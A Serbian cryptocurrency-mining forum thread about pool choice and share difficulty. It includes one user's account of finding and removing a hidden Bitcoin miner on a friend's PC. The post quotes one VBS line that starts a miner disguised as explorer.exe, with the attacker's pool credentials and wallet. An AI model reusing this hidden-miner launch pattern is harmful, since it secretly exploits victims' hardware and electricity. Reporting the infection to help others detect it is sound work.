Šta je novo?

BTC / LTC [poolovi, zastita naloga]

Niko se jos nije prijavio.
Xide je na vreme provalio, nanjusio je covek prevaru cim je video da nema vise onog dela sa SMS porukom. U trenutku mi je delovalo malo neverovatno ali niko nebi koristio gmail kad vec imaju svoj sluzbeni mail.
Bio je to jako lep pokusaj i sva je sreca sto bitcoinsi nemaju vise ni 3% prometa kakav su imali ranije inace bi kukali ljudi na sav glas.
 
Jel može neko da mi objasni kako se registrovati na litecoinpool.org pošto mi stalno izlazi poruka "Public registrations are currently closed" :wall:
 
pisi email ako oces da se cimas, ako ne najbolji pool je wemineltc i prima sve
 
na wemineltc je u principu R oko 0.5% zna da bude i manje sve zavisi na kom si EU serveru i koliko je opterecen
 
Neigra diff bas toliku ulogu slobodno stavi 128 il 192
 
"We recommend setting difficulty max to 192 for 7950/7970, 512 for dual 7970/7950 and 600 for tripple 7970/7950."
A šta da izaberemo mi koji imamo 5850? :p
ma izaberes 64 ili tako nesto, ne znam sta je u ponudi, ja npr. izbegavam poolove koji automatski menjaju share diff jer onda ne znas po kojem si share diffu isporucio koliko sherova i tu vec ostaje prostor za manipulacije , vlasnici poolova preporucuje sto veci share diff da bi rasteretili servere i mrezu ali to je na ustrb kopaca, sad ako te bas interesuje zasto, zainteresuj se malo pa ces naci u temi o LTC, ja sam negde pisao o tome .....
ja kopam na poolovima gde je najmanji share diff,)
 
Bila re rasprava na bitcoin talku, kazu da to nema veze i da slabe masine statisticki dobiju isto na kraju ma koji share bio

a za LTC stvarno nema potrebe juriti male sharove
 
Bila re rasprava na bitcoin talku, kazu da to nema veze i da slabe masine statisticki dobiju isto na kraju ma koji share bio

a za LTC stvarno nema potrebe juriti male sharove
dobro ako verujes u to samo napred samo razmisli o tome koliko vremena treba jednoj 5850-ici da skupi npr 256 sherova da bi isporucila , pa onda koliko cesto pool na kome kopas otvara novi blok (oni koji kopaju na velikim poolovima imaju i najvece gubitke jer isti otvara cesto blokove) i tako taman stigne do 255 shera a ono tvoj pool otvori blok i ide work restart tako da si tih 255 sherova bacio kao i potrosenju el.en. a ako si kopao na share diff 64 onda si u istoj situaciji bacio na pool 192 shera a izgubio si 63.
dali o ovome treba i dalje diskutovati ???
 
Poslednja izmena:
Imas temu ja neznam pojedinosti, ti kad guras male blokove gubis na pingu i na slanju bloka... o ovome se vodila velika rasprava na middlecoin-u-u jer je share 512k (a dosta se kopaju shit coin-i pa zamisli blok na 10-tak sekundi), i vlasnik pool-a je otvorio novu temu bas da se to razjasni

https://bitcointalk.org/index.php?topic=279644.0

Inace za LTC potpisujem da razlike nema nikakve jer sam testirao, osim ako ne kopas sa CPU-em e to nisam testirao
 
svako radi onako kako misli da je najbolje ....
 
Poslednja izmena:
nisam , ovde sam bio zadovoljan, luck mu je takodje cesto iznad 100% pa me drugi poolovi nisu interesovali
 
Odavno više ne kopam ali sam u materiji, pa reko' da podelim ovo sa vama. Ortak se žalio već neko vreme da mu solidna mašina (i5 2500, GTX 660Ti, 12GB RAM, SSD...) daje malo FPS u igrama. Probao je da menja drajvere, neke aplikacije za optimizaciju ali ništa nije davalo konkretne rezultate ili je bilo rezultata do prvog restarta (bitna informacija). Na kraju sam mu predložio da proveri sa GPU-Z koliki je GPU Load dok igra. Pošto mu nisu bile jasne neke stvari u GPU-Z, povežem se preko Teamviewer-a na njegov komp da vidim o čemu se radi i provalim da mu je GPU Load u Windowsu konstantno 97%, vent na 40%, a klokovi kao za 3D mod, što ne bi smelo da se dešava.

Uz pomoć programa GPU Shark pogledam koji procesi muče grafičku, pošto je i on prijavio 97% load, i izvalim da postoji neki skriveni proces, ne vidi se koji je .exe, samo stoji njegov PID. Ubijem taj task (taskkill /PID xxxx) i drugar kaže "šta je sa ventom?", pošto se istog trena smanjila buka :) (već sam sumnjao na BTC virus). Preko msconfiga sam našao da se pokreće neki .vbs file sa mašinom a njegov sadržaj je sledeći (izbačen najveći deo da ne bih davao ideje drugima):

Kod:
errReturn = objProcess.Create("C:/Kernels/driver/explorer.exe  -o http://eu-stratum.btcguild.com:3333 -u charlesh_worker -p imhere -o http://api2.bitcoin.cz:8332 -u charlesh.worker -p imhere -o http://mining.eligius.st:8337 -u 14dRhPtHcB5mw1GWXygVcgRKU4DepLkCRS -p x -I d", null, objConfig, intProcessID)

Koliko se vidi iz ovoga, mašina je kopala na 3 poola, za nekog charlesha :whip: a sama mašina nije imala antivirus, nego se ortak uzdao u zdrav razum i uključen UAC :D

Uglavnom, mašina je očišćena od ovog đubreta a poslao sam i mailove na support sva tri poola, u nadi da će ga makar negde saseći.
 
C:\Kernels\drivers.vbs, a svi ostali fajlovi su bili u C:\Kernels\driver folderu
Inače sam morao da uključim prikaz i skrivenih i sistemskih fajlova da bih video ovaj folder Kernels.
 
Nema toga kod mene. :)

Zanimljiv koncept rudarenja je neko razvio. :D

Hvala za info.
 
Da, zanimljiv koncept da neko kopa na tuđoj grbači, pa još na NV kartici :D Da je bar targetovao ATI kartice...

Prvi put mi je ova ideja pala na pamet kad sam probao krekovanu verziju FTL-a (kasnije sam kupio igru, da ne skačete odmah, hteo sam prvo da je probam :)).
Dokle god je igra bila pokrenuta, GPU Load je bio 100%, ventilator se vrteo na max, a sama igra je toliko jednostavna da nikakav 3D nije potreban, sve može da izgura grafika integrisana u Nokiu 3310. To se recimo na full verziji nije dešavalo (doduše, tek par meseci kasnije sam kupio igru).
 
Poslednja izmena:
Odgovorili su mi sa bitcoin.cz :)

Thanks for reporting this, I'm going to block that user. Botnets like this are unfortunately quite common, however it is difficult to detect them unless they're big enough...
 
Sa cime je obrisan taj virus i ostali tragovi ?
 
Bravo za detektivski posao :), jednu pijavicu si onesposobio (bar na neko vreme), e sad ako ode na drugi pool onda krastavac.
 
sam633 je u pravu, vbs u startup-u, lako ga je bilo obrisati. Zbog ograničenog vremena nisam ispratio sinoć da li se vratio posle restarta ali sad kad znamo kako radi, lako mu je stati na rep.

Zanimljivo da sam probao da uradim copy/paste sadržaja tog vbs u txt fajl u dropbox (imamo deljeni folder u DB). Kako se txt fajl pojavio kod mene, tako ga je Microsoft Security Essentials obrisao :)
 
Da i sam potvrdim pricu, znam coveka, igramo cesto zajedno. Danima se zalio kako mu slabo rade igre.
Inace o ovom virusu smo pisali jos davno u BTC temi ali ovo je prvi slucaj za koji znam da ga je stvarno neko zakacio.
 
sad jos ako uspe da poveze gde ga je zakacio
 
Kad smo već kod virusa, ja pisao ovde. Nisam proveravao ostale verzije cgminera al meni bila 331. Kad sam došao sa odmora MB mi prijavi trojanca. Proverim sa AV on prijavi isto :S:. Skinem 3.4 ništa.... za sada :D
PS.
Kad sam prvi put skinuo 331 verziju nisam dobio nikakvo pozitivno očitavanje, tek nakon mesec dana rudarenja :p
 

Prilozi

  • 2013-09-03_173756.png
    2013-09-03_173756.png
    87.1 KB · Pregleda: 93
Nazad
Vrh Dno